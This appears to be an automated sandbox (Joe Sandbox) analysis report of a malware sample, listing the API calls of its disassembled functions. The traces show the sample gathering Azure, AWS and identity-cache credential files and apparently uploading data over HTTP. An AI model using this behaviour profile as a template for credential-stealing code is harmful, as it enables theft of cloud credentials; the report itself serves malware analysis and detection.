                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • strtok_s.MSVCRT ref: 022E0582
                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022E05C9
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E05D0
                                                            • StrStrA.SHLWAPI(00000000,00421618), ref: 022E05EC
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E05FA
                                                              • Part of subcall function 022E8B47: malloc.MSVCRT ref: 022E8B4F
                                                              • Part of subcall function 022E8B47: strncpy.MSVCRT ref: 022E8B6A
                                                            • StrStrA.SHLWAPI(00000000,00421620), ref: 022E0636
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0644
                                                            • StrStrA.SHLWAPI(00000000,00421628), ref: 022E0680
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E068E
                                                            • StrStrA.SHLWAPI(00000000,00421630), ref: 022E06CA
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E06DC
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0769
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0781
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E0799
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E07B1
                                                            • lstrcat.KERNEL32(?,0042164C), ref: 022E07C9
                                                            • lstrcat.KERNEL32(?,00421660), ref: 022E07D8
                                                            • lstrcat.KERNEL32(?,00421670), ref: 022E07E7
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E07FA
                                                            • lstrcat.KERNEL32(?,00421678), ref: 022E0809
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E081C
                                                            • lstrcat.KERNEL32(?,0042167C), ref: 022E082B
                                                            • lstrcat.KERNEL32(?,00421680), ref: 022E083A
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E084D
                                                            • lstrcat.KERNEL32(?,00421688), ref: 022E085C
                                                            • lstrcat.KERNEL32(?,0042168C), ref: 022E086B
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E087E
                                                            • lstrcat.KERNEL32(?,00421698), ref: 022E088D
                                                            • lstrcat.KERNEL32(?,0042169C), ref: 022E089C
                                                            • strtok_s.MSVCRT ref: 022E08E0
                                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022E08F5
                                                            • memset.MSVCRT ref: 022E0944
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                            • String ID:
                                                            • API String ID: 3689735781-0
                                                            • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                            • Instruction ID: c70e8987a47bc3c3ee0f4c1b7c5d73c25ddfd72a9a95e22a47af87f929006125
                                                            • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                            • Instruction Fuzzy Hash: 3FD14C75A20308ABCF04EBE4DD85EFE777AAF54300F904419E103A6198EE78AA45DF61
                                                            Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00405A13
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0087AFD0,00000000,?,00845220,00000000,?,00421A1C), ref: 00405E71
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                            • memcpy.MSVCRT(?), ref: 00405EFE
                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                            • HttpOpenRequestA.WININET(00000000,0087AEF0,?,0087A830,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                            • String ID: "$"$------$------$------
                                                            • API String ID: 1406981993-2180234286
                                                            • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                            • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                            • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                            • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                            Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00414D87
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                            • memset.MSVCRT ref: 00414E13
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                            • memset.MSVCRT ref: 00414E9F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00876020,?,000003E8), ref: 00414A4A
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                            • memset.MSVCRT ref: 00414F2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                            • API String ID: 4017274736-156832076
                                                            • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                            • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                            • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                            • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                            Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                            • lstrcatA.KERNEL32(?,00000000,00876280,00421474,00876280,00421470,00000000), ref: 0040D208
                                                            • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                            • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                            • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                            • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                            • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                            • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                            • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                            • lstrlenA.KERNEL32(?), ref: 0040D339
                                                            • memset.MSVCRT ref: 0040D388
                                                              • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                            • String ID:
                                                            • API String ID: 2775534915-0
                                                            • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                            • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                            • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                            • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                            Function 022DD157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD1EA
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022DD32E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022DD335
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD46F
                                                            • lstrcat.KERNEL32(?,00421478), ref: 022DD47E
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD491
                                                            • lstrcat.KERNEL32(?,0042147C), ref: 022DD4A0
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4B3
                                                            • lstrcat.KERNEL32(?,00421480), ref: 022DD4C2
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4D5
                                                            • lstrcat.KERNEL32(?,00421484), ref: 022DD4E4
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD4F7
                                                            • lstrcat.KERNEL32(?,00421488), ref: 022DD506
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD519
                                                            • lstrcat.KERNEL32(?,0042148C), ref: 022DD528
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022DD53B
                                                            • lstrcat.KERNEL32(?,00421490), ref: 022DD54A
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                            • lstrlen.KERNEL32(?), ref: 022DD591
                                                            • lstrlen.KERNEL32(?), ref: 022DD5A0
                                                            • memset.MSVCRT ref: 022DD5EF
                                                              • Part of subcall function 022EACD7: StrCmpCA.SHLWAPI(0064A350,022DAA0E,?,022DAA0E,0064A350), ref: 022EACF6
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DD61B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                            • String ID:
                                                            • API String ID: 1973479514-0
                                                            • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                            • Instruction ID: beaf0747bffc27c3fc1b1a3eea6341950931f12f600e6f84c59043fa2ccd1e59
                                                            • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                            • Instruction Fuzzy Hash: 8CE14B75960308ABCF08FBE4DD95EEE737ABF64301F904159E107A61A4DE34AA08DF61
                                                            Function 022D5BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                              • Part of subcall function 022D4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                              • Part of subcall function 022D4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                              • Part of subcall function 022D4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022D5C5F
                                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 022D5C7A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022D5DFA
                                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 022D60D8
                                                            • lstrlen.KERNEL32(00000000), ref: 022D60E9
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D60FA
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D6101
                                                            • lstrlen.KERNEL32(00000000), ref: 022D6116
                                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 022D612D
                                                            • lstrlen.KERNEL32(00000000), ref: 022D613F
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022D6158
                                                            • memcpy.MSVCRT(?), ref: 022D6165
                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 022D6182
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022D6196
                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 022D61B3
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6217
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D6224
                                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022D5E5F
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • InternetCloseHandle.WININET(00000000), ref: 022D622E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                            • String ID:
                                                            • API String ID: 1703137719-0
                                                            • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                            • Instruction ID: a9242f6e855a41c5ae0169ec2983eb5f566070e44f36976ba87d8ea55160db85
                                                            • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                            • Instruction Fuzzy Hash: 4F12BA71960328AACF15EBE4DD95EEEB37ABF64700F804199A10762194EF742B88DF50
                                                            Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                            • StrCmpCA.SHLWAPI(?,0087AEB0), ref: 0040493A
                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0087AEC0), ref: 00404DE8
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                            • HttpOpenRequestA.WININET(00000000,0087AEF0,?,0087A830,00000000,00000000,00400100,00000000), ref: 00404B15
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
